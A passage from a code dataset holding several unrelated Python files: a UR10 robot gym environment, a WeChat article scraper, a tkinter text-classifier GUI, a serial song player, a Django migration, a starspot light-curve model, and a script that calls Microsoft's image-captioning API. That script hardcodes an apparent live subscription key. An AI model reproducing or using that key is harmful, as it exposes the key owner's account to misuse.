self.sim.data.sensordata.copy()\n\n if self.start_flag:\n ft = numpy.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n self.start_flag = False\n\n x_pos = self.sim.data.get_body_xpos(\"gripper_dummy_heg\")\n x_mat = self.sim.data.get_body_xmat(\"gripper_dummy_heg\")\n rpy = normalize_rad(rotations.mat2euler(x_mat))\n\n obs = numpy.concatenate([\n rot_mat.dot(x_pos-self.goal[:3]),\n rot_mat.dot(normalize_rad(rpy-self.goal[3:])),\n ft.copy()\n ])\n if self.save_data:\n self.fts.append([ft[0], ft[1], ft[2], ft[3], 
ft[4], ft[5],])\n self.obs.append(obs)\n self.fxs.append(ft[0])\n self.fys.append(ft[1])\n self.fzs.append(ft[2])\n self.poses.append(numpy.concatenate(\n [x_pos-self.goal[:3],\n normalize_rad(rpy-self.goal[3:])]))\n self.last_obs = obs\n return obs\n \n def _viewer_setup(self):\n body_id = self.sim.model.body_name2id('body_link')\n lookat = self.sim.data.body_xpos[body_id]\n for idx, value in enumerate(lookat):\n self.viewer.cam.lookat[idx] = value\n self.viewer.cam.distance = 2.5\n self.viewer.cam.azimuth = 132.\n self.viewer.cam.elevation = -14.\n \n def _render_callback(self):\n pass\n \n def _reset_sim(self):\n # Tracking the first step to zero the ft-sensor\n self.start_flag = True\n if self.episode > 0:\n self.success_rate = float(numpy.sum(self.results)/float(len(self.results)))\n print(\"Episode: {} Success Rate: {} \".format(self.episode, self.success_rate))\n if len(self.results) < 10:\n self.results.append(0)\n else:\n self.results.pop(0)\n self.results.append(0)\n \n if self.save_data and self.episode > 0:\n if self.success_flag == 1:\n self.rewards.append(self.success_reward)\n self.reward_sum = numpy.sum(self.rewards)\n \n save_dict = {\n #\"observations\" : self.obs,\n #\"ft_values\" : self.fts,\n #\"rewards\" : self.rewards,\n #\"poses\" : self.poses\n \"fx\" : self.fxs,\n \"fy\" : self.fys,\n \"fz\" : self.fzs,\n \"steps\" : self.step_count,\n \"success\" : self.success_flag,\n \"reward\" : self.reward_sum\n }\n with open(os.path.join(*[SAVE_PATH, \"episode_{}.json\".format(self.episode)]), \"w\") as file:\n json.dump(save_dict,file)\n file.write('\\n')\n \n #self.obs = []\n #self.fts = []\n #self.rewards = []\n #self.poses = []\n self.fxs = []\n self.fys = []\n self.fzs = []\n self.rewards = []\n self.step_count = 0\n self.success_flag = 0\n self.episode += 1\n \n if self.vary == True:\n # deviation in x,y,z, direction rotation stays the same\n deviation_x = numpy.concatenate(\n (numpy.random.normal(loc=0.0, scale=1.0, size=(3,)),\n [0, 0, 0]))\n deviation_q = self.get_dq(deviation_x * 0.005)\n else:\n deviation_q = numpy.array([0, 0, 0, 0, 0, 0])\n self.set_state(self.initial_qpos + deviation_q)\n self.sim.forward()\n self.init_x = numpy.concatenate(\n (self.sim.data.get_body_xpos(\"gripper_dummy_heg\"), \n self.sim.data.get_body_xquat(\"gripper_dummy_heg\")\n ))\n self.sim.data.ctrl[:] = self.initial_qpos + deviation_q\n return True\n\n def _sample_goal(self):\n\n with open(GOAL_PATH, encoding='utf-8') as file:\n goal = json.load(file)\n xpos = goal['xpos']\n xquat = goal['xquat']\n rpy = normalize_rad(rotations.quat2euler(xquat))\n return numpy.concatenate([xpos, rpy]).copy()\n\n def _is_success(self, achieved_goal, desired_goal):\n rot_mat = self.sim.data.get_body_xmat('gripper_dummy_heg')\n x_pos = self.sim.data.get_body_xpos(\"gripper_dummy_heg\")\n x_mat = self.sim.data.get_body_xmat(\"gripper_dummy_heg\")\n rpy = normalize_rad(rotations.mat2euler(x_mat))\n obs = numpy.concatenate([\n rot_mat.dot(x_pos-self.goal[:3]), \n rot_mat.dot(normalize_rad(rpy-self.goal[3:]))\n ])\n d = goal_distance(obs,desired_goal)\n if self.curriculum_learning:\n if self.episode < self.cur_eps_threshold:\n if d < self.initial_distance_threshold:\n if len(self.results) == 0:\n self.results.append(1)\n else:\n self.results.pop()\n self.results.append(1)\n self.success_flag = 1\n return True\n else:\n return False\n else:\n if d < self.final_distance_threshold:\n if len(self.results) == 0:\n self.results.append(1)\n else:\n self.results.pop()\n self.results.append(1)\n self.success_flag = 
1\n return True\n else:\n return False\n else:\n if d < self.distance_threshold:\n if len(self.results) == 0:\n self.results.append(1)\n else:\n self.results.pop()\n self.results.append(1)\n self.success_flag = 1\n return True\n else:\n return False\n\n def _is_failure(self, achieved_goal, desired_goal):\n #d = goal_distance(achieved_goal, desired_goal)\n # removed early stop because baselines did not work with it\n #return (d > self.fail_threshold)\n #& (numpy.round(self.sim.get_state()[0]/0.0005).astype('int') > 200)\n return False\n\n def _env_setup(self, initial_qpos):\n self.sim.data.ctrl[:] = initial_qpos\n self.set_state(initial_qpos)\n self.sim.forward()\n\n def render(self, mode='human', width=500, height=500):\n return super(Ur10Env, self).render(mode, width, height)","sub_path":"gym/envs/robotics/ur10_static_position_env.py","file_name":"ur10_static_position_env.py","file_ext":"py","file_size_in_byte":14269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"323067856","text":"import time\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\n# Fetch news articles from a WeChat official account\n\ndef get_access():\n return webdriver.Firefox()\n\n\ndef search_page(driver, url):\n driver.get(url)\n print(driver.current_url)\n elem = driver.find_element_by_class_name(\"query\")\n elem.send_keys(u\"国际农业航空施药技术联合实验室\")\n btn = driver.find_element_by_class_name(\"swz2\")\n btn.click()\n print(driver.current_url)\n time.sleep(1)\n page = driver.page_source\n return page\n\n\ndef load_page(driver, url):\n driver.get(url)\n page = driver.page_source\n return page\n\n\ndef next_page(page):\n soup = BeautifulSoup(page, \"html5lib\")\n link = soup.find('div', attrs={\"class\": \"img-box\"})\n link_to = link.find('a')\n return link_to.attrs['href']\n\n\ndef get_news_urls(page):\n base_url = 'https://mp.weixin.qq.com'\n # container mapping news titles to page URLs\n news_urls = {}\n soup = BeautifulSoup(page, \"html5lib\")\n # news list\n news_list = soup.find_all('h4', attrs={'class': 'weui_media_title'})\n # all news titles\n for i in news_list:\n news_title = i.get_text()\n news_url = base_url + i.attrs['hrefs']\n news_urls[news_title] = news_url\n return news_urls\n\n\ndef get_news(news_urls):\n for url in news_urls:\n print(url, news_urls[url])\n\n\ndef initial():\n html_url = \"http://weixin.sogou.com/\"\n web_look = get_access()\n html_url = search_page(web_look, html_url)\n true_url = next_page(html_url)\n news_urls = get_news_urls(load_page(web_look, true_url))\n get_news(news_urls)\n\n\nif __name__ == '__main__':\n initial()\n","sub_path":"get_news/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"214804908","text":"#IMPORTS\nfrom threading import Thread\n\nfrom ttkthemes import ThemedStyle\n\nimport Helper_Method\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport time\n\nfrom AgglomerativeClusteringClassifier import ACC_Model_Trainer, ACC_Data_To_CSV, ACC_User_Input\nfrom Constats import Status\nfrom WordGramClassifier import WGC_Data_To_CSV, WGC_Model_Trainer, WGC_User_Input\nfrom MergedClassifier import MC_Data_To_CSV, MC_Model_Trainer, MC_User_Input\nfrom KmeanClusteringClassifier import CC_Data_To_CSV, CC_Model_Trainer, CC_User_Input\nfrom StyleClassifier import SC_Data_To_CSV, SC_Model_Trainer, SC_User_Input\nfrom pathlib import Path\n\n\ndef global_timer():\n while True:\n is_model_trained()\n time.sleep(1)\n\n if 
Status.is_app_waiting:\n message_status(\"Processing Please Wait!\", 1)\n button2.configure(state='disabled')\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n message_status(\"Waiting For Response\", 1)\n is_model_trained()\n\n\n\ndef is_model_trained():\n if Status.is_app_waiting == False:\n if Status.classifier_type == 'stylometry':\n my_file = Path(\"stylometry_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n elif Status.classifier_type == 'content':\n my_file = Path(\"wordgram_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n elif Status.classifier_type == 'agglomerative':\n my_file = Path(\"agglomerative_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n else:\n my_file = Path(\"clustering_model\")\n if my_file.is_file() == False:\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n button2.configure(state='enabled')\n\ndef message_status(message,type):\n\n if type == 0:\n status.configure(foreground=\"red\")\n status_text.set(message)\n else:\n status.configure(foreground=\"green\")\n status_text.set(message)\n\n#EVENT HANDLER\n\ndef model_trainer_start():\n update_status()\n if Status.classifier_type == 'stylometry':\n SC_Data_To_CSV.runProgram()\n SC_Model_Trainer.runProgram()\n elif Status.classifier_type == 'content':\n WGC_Data_To_CSV.runProgram()\n WGC_Model_Trainer.runProgram()\n elif Status.classifier_type == 'merged':\n MC_Data_To_CSV.runProgram()\n MC_Model_Trainer.runProgram()\n elif Status.classifier_type == 'agglomerative':\n ACC_Data_To_CSV.runProgram()\n ACC_Model_Trainer.runProgram()\n else :\n CC_Data_To_CSV.runProgram()\n CC_Model_Trainer.runProgram()\n is_model_trained()\n Status.is_app_waiting = False\n button2.configure(state='enabled')\n button3.configure(state='enabled')\n button4.configure(state='enabled')\n\ndef model_trainer():\n button2.configure(state='disabled')\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n Status.is_app_waiting = True\n t = Thread(target=model_trainer_start)\n t.start()\n\ndef form_sheet_start():\n update_status()\n if Status.classifier_type == 'stylometry':\n view = Helper_Method.popupmsg(SC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n elif Status.classifier_type == 'content':\n view = Helper_Method.popupmsg(WGC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n elif Status.classifier_type == 'merged':\n view = Helper_Method.popupmsg(MC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n elif Status.classifier_type == 'agglomerative':\n view = Helper_Method.popupmsg(ACC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n else :\n view = Helper_Method.popupmsg(CC_User_Input.runProgram(textarea.get(\"1.0\", tk.END)))\n Status.is_app_waiting = False\n\ndef form_sheet_all():\n Status.is_report_prediction = True\n Status.is_app_waiting = True\n t1 = Thread(target=form_sheet_start)\n t1.start()\n\ndef form_sheet():\n Status.is_app_waiting = True\n t1 = Thread(target=form_sheet_start)\n 
t1.start()\n\ndef update_status_combo(index, value, op):\n classifier_Type.selection_clear()\n if classifier_Type.current() == 1:\n ngram_type.configure(state='disabled')\n else:\n ngram_type.configure(state='readonly')\n update_status()\n is_model_trained()\n\n\ndef update_status():\n classifier_Type.selection_clear()\n if classifier_Type.current() == 0:\n Status.classifier_type = 'clustering'\n elif classifier_Type.current() == 1:\n Status.classifier_type = 'stylometry'\n elif classifier_Type.current() == 2:\n Status.classifier_type = 'content'\n elif classifier_Type.current() == 3:\n Status.classifier_type = 'agglomerative'\n elif classifier_Type.current() == 4:\n Status.classifier_type = 'merged'\n\n if ngram_type.current() == 0:\n Status.vector_analyser_type = \"word\"\n else:\n Status.vector_analyser_type = \"char\"\n\n # map combobox index to the n-gram upper bound: \"1-2\" is listed first,\n # then \"1-1\", then \"1-3\" through \"1-10\" in order\n if ngram_val.current() == 0:\n Status.vector_analyser_range = 2\n elif ngram_val.current() == 1:\n Status.vector_analyser_range = 1\n elif ngram_val.current() == 2:\n Status.vector_analyser_range = 3\n elif ngram_val.current() == 3:\n Status.vector_analyser_range = 4\n elif ngram_val.current() == 4:\n Status.vector_analyser_range = 5\n elif ngram_val.current() == 5:\n Status.vector_analyser_range = 6\n elif ngram_val.current() == 6:\n Status.vector_analyser_range = 7\n elif ngram_val.current() == 7:\n Status.vector_analyser_range = 8\n elif ngram_val.current() == 8:\n Status.vector_analyser_range = 9\n else:\n Status.vector_analyser_range = 10\n\n if select_kbest_range.current() == 0:\n kbest_threshold = 1000\n elif select_kbest_range.current() == 1:\n kbest_threshold = 500\n else:\n kbest_threshold = 5000\n\n\n# root\nroot = tk.Tk()\nroot.title(\"Gender Identifier\")\nstyle = ThemedStyle(root)\nstyle.set_theme(\"arc\")\nHelper_Method.center_window(1010, 580,root)\n\n# sidebar\nsidebar = tk.Frame(root, width=350, bg='white', height=800, relief='sunken', borderwidth=2)\n\n# TYPES\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nttk.Label(sidebar,text=\"Classifier Type\", style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nclassifier_Type_Text = tk.StringVar()\nclassifier_Type = ttk.Combobox(sidebar,textvariable=classifier_Type_Text,width=22,height=45,state=\"readonly\", values=(\"KMean Cluster (Recommended)\", \"Stylometry Method\", \"Content Method\",\"Agglomerative Cluster\",\"Merged Classifier\"))\nclassifier_Type.pack(side=tk.TOP)\nclassifier_Type.current(0)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=3)\n\nttk.Label(sidebar,text=\"N-Gram Type\", style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nngram_type_text = tk.StringVar()\nngram_type = ttk.Combobox(sidebar,textvariable=ngram_type_text,width=22,height=15,state=\"readonly\", values=(\"Word (Recommended)\", \"Char\"))\nngram_type.pack(side=tk.TOP)\nngram_type.current(0)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=3)\n\nttk.Label(sidebar,text=\"N-Gram Range\", style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nngram_val_text = tk.StringVar()\nngram_val = ttk.Combobox(sidebar,textvariable=ngram_val_text,width=22,height=15,state=\"readonly\", values=(\"1-2 (Recommended)\", \"1-1\", \"1-3\", \"1-4\", \"1-5\", \"1-6\", \"1-7\", \"1-8\", \"1-9\", \"1-10\"))\nngram_val.pack(side=tk.TOP)\nngram_val.current(0)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=3)\n\nttk.Label(sidebar,text=\"KBest Threshold\", style=\"BW.TLabel\",width=20,background=\"white\",foreground=\"black\").pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=2)\nselect_kbest_range_text = tk.StringVar()\nselect_kbest_range = ttk.Combobox(sidebar,textvariable=select_kbest_range_text,width=22,height=15,state=\"readonly\", values=(\"1000 (Recommended)\", \"500\", \"5000\"))\nselect_kbest_range.pack(side=tk.TOP)\nselect_kbest_range.current(0)\n\n# ACTIONS\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=33)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=33)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=20)\nstatus_text = tk.StringVar()\nstatus_text.set('Waiting For Response')\nstatus = ttk.Label(sidebar,textvariable=status_text, style=\"BW.TLabel\",width=22,background=\"white\",foreground=\"green\")\nstatus.pack(side=tk.TOP)\nttk.Separator(sidebar,orient=\"vertical\").pack(padx=5, pady=15)\nbutton4 = ttk.Button(sidebar,width=22,text=\"Report Prediction\",command=form_sheet)\nbutton2 = ttk.Button(sidebar,width=22,text=\"Re-Train Model\",command=model_trainer)\nbutton3 = ttk.Button(sidebar,width=22,text=\"Make Prediction\",command=form_sheet_all)\nbutton2.pack(side=tk.TOP, pady=4, padx=10)\nbutton3.pack(side=tk.TOP, pady=4, padx=10)\nbutton4.pack(side=tk.TOP, pady=4, padx=10)\nsidebar.pack(expand=False, fill='both', side='left', anchor='nw')\n\n# combo changing events\nclassifier_Type_Text.trace('w',update_status_combo)\nngram_type_text.trace('w',update_status_combo)\nngram_val_text.trace('w',update_status_combo)\nselect_kbest_range_text.trace('w',update_status_combo)\n\n# main content area\nmainarea = tk.Frame(root, bg='#CCC', width=700, height=800)\ntextarea = tk.Text(mainarea,height=72,width=120)\ntextarea.pack(side=tk.RIGHT)\ntextarea.insert(tk.END, \"Write your Code\")\nmainarea.pack(expand=True, fill='both', side='right')\nis_model_trained()\n\nt = Thread(target=global_timer)\nt.start()\n\nroot.mainloop()\n","sub_path":"Plugin Projects/Matsbot/Classifier/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"179154551","text":"import serial\nimport time\n\nser = serial.Serial(\"COM3\")\n\nf = open('./songs.csv', 'r')\n\nsongs = []\nsongs_menu = {}\nwhile True:\n line = f.readline()\n if line == '':\n break\n line_data = line.strip().split(',')\n songs.append(line_data)\n songs_menu[line_data[0]] = line_data[1:]\n\n\nprint('Which song do you like? Enter the number:')\nfor i in range(len(songs)):\n print('{}. 
{}'.format(i + 1, songs[i][0]))\noption = int(input('>> '))\nsong = songs_menu[songs[option - 1][0]]\n\ntime.sleep(2)\nfor i in song:\n ser.write((i+'$').encode())\n print(i)\n time.sleep(0.5)\n","sub_path":"qiuhuiming/code/week8/sing.py","file_name":"sing.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"180874959","text":"import requests\nimport json\nurl=\"https://westus.api.cognitive.microsoft.com/vision/v1.0/describe?maxCandidates=1\"\nheaders = {\n # Request headers\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': '1e8134bdc68e401bb07f143de8e9c1e0',\n}\nparameters={\n 'maxCandidates':'1'\n}\nbod={\n \"url\":\"http://www.planwallpaper.com/static/images/desktop-year-of-the-tiger-images-wallpaper.jpg\"\n }\n\n\n# the request body must be valid JSON (double-quoted), since Content-Type is application/json\nresponse=requests.post(url,'{\"url\":\"http://www.wallpapereast.com/static/images/spring-in-nature-wide-wallpaper-603794.jpg\"}',headers=headers)\n#response=requests.post(url,data=json.dumps(bod),headers=headers)\n\ndata=response.json()\nresult=data['description']['captions'][0]['text']\n\n\n\n#print(data)\nprint(result)\n\n\n\n\nfrom gtts import gTTS\nimport os\n\ntts = gTTS(text=result, lang='en')\ntts.save(\"good.mp3\")\nos.system(\"good.mp3\")","sub_path":"Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"349946876","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clientes', '0001_initial'),\n ('productos', '0002_auto_20141112_0418'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AbonoCliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('abono', models.DecimalField(max_digits=8, decimal_places=2)),\n ('fecha', models.DateField(auto_now_add=True)),\n ('ap', models.IntegerField()),\n ('cliente', models.ForeignKey(to='clientes.Cliente')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Apartado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('no_apartado', models.IntegerField()),\n ('fecha', models.DateField(auto_now_add=True)),\n ('cantidad', models.PositiveIntegerField()),\n ('precio', models.DecimalField(max_digits=8, decimal_places=2, blank=True)),\n ('fecha_vence', models.DateField(default=datetime.datetime(2014, 11, 27, 16, 22, 4, 132580))),\n ('estatus', models.CharField(default=b'A', max_length=1, choices=[(b'A', b'Activo'), (b'X', b'Anulado'), (b'C', b'Completado')])),\n ('cliente', models.ForeignKey(to='clientes.Cliente')),\n ('producto', models.ForeignKey(to='productos.Producto')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DeudaCliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('deuda', models.DecimalField(max_digits=8, decimal_places=2)),\n ('cliente', models.ForeignKey(to='clientes.Cliente')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"apartados/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"578955726","text":"# Licensed under the MIT License - see LICENSE.rst\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport os\nimport numpy as np\nfrom scipy.integrate import quad\nimport astropy.units as u\nfrom astropy.coordinates import UnitSphericalRepresentation, CartesianRepresentation\nfrom astropy.coordinates.matrix_utilities import rotation_matrix, matrix_product\n\nfrom .sun import draw_random_sunspot_latitudes, draw_random_sunspot_radii\n\n__all__ = ['Star', 'Spot']\n\ntrappist1_posteriors_path = os.path.join(os.path.dirname(__file__), os.pardir,\n 'data', 'trappist1',\n 'posteriors_bright_spot.txt')\n #'trappist1_spotmodel_posteriors.txt')\n #'trappist1_spotmodel_posteriors_onehemisphere.txt')\n#'trappist1_spotmodel_posteriors.txt')\n\nk296_posteriors_path = os.path.join(os.path.dirname(__file__), os.pardir,\n 'data', 'k296',\n 'k296_spotmodel_posteriors.txt')\n\n#np.random.seed(42)\n\n\nclass Spot(object):\n \"\"\"\n Properties of a starspot.\n \"\"\"\n def __init__(self, x=None, y=None, z=None, r=None, stellar_radius=1,\n contrast=None):\n \"\"\"\n Parameters\n ----------\n x : float\n X position [stellar radii]\n y : float\n Y position [stellar radii]\n z : float\n Z position [stellar radii], default is ``z=sqrt(r_star^2 - x^2 - y^2)``.\n r : float\n Spot radius [stellar radii], default is ``r=1``.\n stellar_radius : float\n Radius of the star, in the same units as ``x,y,z,r``. Default is 1.\n \"\"\"\n if z is None:\n z = np.sqrt(stellar_radius**2 - x**2 - y**2)\n self.r = r\n self.cartesian = CartesianRepresentation(x=x, y=y, z=z)\n self.contrast = contrast\n\n @classmethod\n def from_latlon(cls, latitude, longitude, radius, contrast=None):\n \"\"\"\n Construct a spot from latitude, longitude coordinates\n\n Parameters\n ----------\n latitude : float\n Spot latitude [deg]\n longitude : float\n Spot longitude [deg]\n radius : float\n Spot radius [stellar radii]\n \"\"\"\n\n cartesian = latlon_to_cartesian(latitude, longitude)\n\n return cls(x=cartesian.x.value, y=cartesian.y.value,\n z=cartesian.z.value, r=radius, contrast=contrast)\n\n @classmethod\n def from_sunspot_distribution(cls, mean_latitude=15, radius_multiplier=1,\n contrast=0.7):\n \"\"\"\n Parameters\n ----------\n mean_latitude : float\n Define the mean absolute latitude of the two symmetric active\n latitudes, where ``mean_latitude > 0``.\n \"\"\"\n lat = draw_random_sunspot_latitudes(n=1, mean_latitude=mean_latitude)[0]\n lon = 2*np.pi * np.random.rand() * u.rad\n radius = draw_random_sunspot_radii(n=1)[0]\n\n cartesian = latlon_to_cartesian(lat, lon)\n\n return cls(x=cartesian.x.value, y=cartesian.y.value,\n z=cartesian.z.value, r=radius*radius_multiplier,\n contrast=contrast)\n\n def __repr__(self):\n return (\"\"\n .format(self.x, self.y, self.z, self.r))\n\n\ndef latlon_to_cartesian(latitude, longitude, stellar_inclination=90*u.deg):\n \"\"\"\n Convert coordinates in latitude/longitude for a star with a given\n stellar inclination into cartesian coordinates.\n\n The X-Y plane is the sky plane: x is aligned with the stellar equator, y is\n aligned with the stellar rotation axis.\n\n Parameters\n ----------\n latitude : float or `~astropy.units.Quantity`\n Spot latitude. Will assume unit=deg if none is specified.\n longitude : float or `~astropy.units.Quantity`\n Spot longitude. Will assume unit=deg if none is specified.\n stellar_inclination : float\n Stellar inclination angle, measured away from the line of sight,\n in [deg]. 
Default is 90 deg.\n\n Returns\n -------\n cartesian : `~astropy.coordinates.CartesianRepresentation`\n Cartesian representation in the frame described above.\n \"\"\"\n\n if not hasattr(longitude, 'unit') and not hasattr(latitude, 'unit'):\n longitude *= u.deg\n latitude *= u.deg\n\n c = UnitSphericalRepresentation(longitude, latitude)\n cartesian = c.to_cartesian()\n\n rotate_about_z = rotation_matrix(90*u.deg, axis='z')\n rotate_is = rotation_matrix(stellar_inclination, axis='y')\n transform_matrix = matrix_product(rotate_about_z, rotate_is)\n cartesian = cartesian.transform(transform_matrix)\n return cartesian\n\n\nclass Star(object):\n \"\"\"\n Object defining a star.\n \"\"\"\n def __init__(self, spots=None, u1=0.4987, u2=0.1772, r=1,\n radius_threshold=0.1, rotation_period=25*u.day):\n \"\"\"\n The star is assumed to have stellar inclination 90 deg (equator-on).\n\n Parameters\n ----------\n u1 : float (optional)\n Quadratic limb-darkening parameter, linear term\n u2 : float (optional)\n Quadratic limb-darkening parameter, quadratic term\n r : float (optional)\n Stellar radius (default is unity)\n radius_threshold : float (optional)\n If all spots are smaller than this radius, use the analytic solution\n to compute the stellar centroid, otherwise use the numerical\n solution.\n spots : list (optional)\n List of spots on this star.\n rotation_period : `~astropy.units.Quantity`\n Stellar rotation period [default = 25 d].\n contrast : float (optional)\n Spot contrast relative to photosphere. Default is ``c=0.7``\n \"\"\"\n if spots is None:\n spots = []\n self.spots = spots\n\n self.spots_cartesian = CartesianRepresentation(x=[spot.cartesian.x for spot in spots],\n y=[spot.cartesian.y for spot in spots],\n z=[spot.cartesian.z for spot in spots])\n self.spots_r = np.array([spot.r for spot in spots])\n self.spot_contrasts = np.array([spot.contrast for spot in spots])\n self.x = 0\n self.y = 0\n self.r = r\n self.u1 = u1\n self.u2 = u2\n self.radius_threshold = radius_threshold\n self.rotations_applied = 0 * u.deg\n self.rotation_period = rotation_period\n self.inclination = 90*u.deg\n self.unspotted_flux = (2 * np.pi *\n quad(lambda r: r * self.limb_darkening_normed(r),\n 0, self.r)[0])\n\n def plot(self, n=3000, ax=None):\n \"\"\"\n Plot a 2D projected schematic of the star and its spots.\n\n Parameters\n ----------\n ax : `~matplotlib.pyplot.Axes`\n Axis object to draw the plot on\n n : int\n Number of pixels per side in the image.\n\n Returns\n -------\n ax : `~matplotlib.pyplot.Axes`\n Matplotlib axis object, with the new plot on it.\n \"\"\"\n import matplotlib.pyplot as plt\n\n if ax is None:\n ax = plt.gca()\n\n image = self._compute_image(n=n)\n\n ax.imshow(image, origin='lower', interpolation='nearest',\n cmap=plt.cm.Greys_r, extent=[-1, 1, -1, 1],\n vmin=0, vmax=1)\n ax.set_aspect('equal')\n\n ax.set_xlim([-1, 1])\n ax.set_ylim([-1, 1])\n ax.set_xlabel('x [$R_\\star$]', fontsize=14)\n ax.set_ylabel('y [$R_\\star$]', fontsize=14)\n return ax\n\n @classmethod\n def with_trappist1_spot_distribution(cls):\n samples = np.loadtxt(trappist1_posteriors_path)\n sample_index = np.random.randint(0, samples.shape[0])\n\n lat0, lon0, rad0, lat1, lon1, rad1, lat2, lon2, rad2, contrast, kep_offset = samples[sample_index, :]\n\n spots = [Spot.from_latlon(lat0, lon0, rad0, contrast),\n Spot.from_latlon(lat1, lon1, rad1, contrast),\n Spot.from_latlon(lat2, lon2, rad2, contrast)]\n\n return cls(spots=spots, rotation_period=3.3*u.day)\n\n @classmethod\n def with_k296_spot_distribution(cls):\n 
samples = np.loadtxt(k296_posteriors_path)\n sample_index = np.random.randint(0, samples.shape[0])\n\n lat0, lon0, rad0, lat1, lon1, rad1, contrast, kep_offset = samples[sample_index, :]\n\n spots = [Spot.from_latlon(lat0, lon0, rad0, contrast),\n Spot.from_latlon(lat1, lon1, rad1, contrast)]\n\n return cls(spots=spots, rotation_period=36.085629155859351*u.day)\n\n def spotted_area(self, times, t0=0):\n \"\"\"\n Compute flux at ``times`` as the star rotates.\n\n Parameters\n ----------\n times: `~numpy.ndarray`\n Times\n t0 : float\n Reference epoch.\n\n Returns\n -------\n area : `~numpy.ndarray`\n Area covered by spots at ``times`` [Hem]\n \"\"\"\n p_rot_d = self.rotation_period.to(u.d).value\n rotational_phases = (((times - t0) % p_rot_d) / p_rot_d) * 2*np.pi*u.rad\n\n # Rotate the star about its axis assuming stellar inclination 90 deg\n transform_matrix = rotation_matrix(rotational_phases[:, np.newaxis],\n axis='y')\n old_cartesian = self.spots_cartesian\n new_cartesian = old_cartesian.transform(transform_matrix)\n\n # Use numpy array broadcasting to vectorize computations with spot radii\n broadcast_radii = (np.ones_like(rotational_phases.value)[:, np.newaxis]\n * self.spots_r)\n\n # Only include spot flux if it's on the observer facing side\n visible = (new_cartesian.z > 0).astype(int)\n\n # Compute radial position of spot\n r_spots = np.sqrt(new_cartesian.x**2 + new_cartesian.y**2)\n\n # Compute approximate spot area, given foreshortening in 3D\n spot_areas = (np.pi * broadcast_radii**2 *\n np.sqrt(1 - (r_spots/self.r)**2))\n area = np.sum(spot_areas * visible, axis=1) / (2 * np.pi * self.r**2)\n if hasattr(area, 'unit'):\n area = area.value\n return area\n\n def flux(self, times, t0=0):\n \"\"\"\n Compute flux at ``times`` as the star rotates.\n\n Parameters\n ----------\n times: `~numpy.ndarray`\n Times\n t0 : float\n Reference epoch.\n\n Returns\n -------\n flux : `~numpy.ndarray`\n Fluxes at ``times``\n \"\"\"\n p_rot_d = self.rotation_period.to(u.d).value\n rotational_phases = (((times - t0) % p_rot_d) / p_rot_d) * 2*np.pi*u.rad\n\n # Rotate the star about its axis assuming stellar inclination 90 deg\n transform_matrix = rotation_matrix(rotational_phases[:, np.newaxis],\n 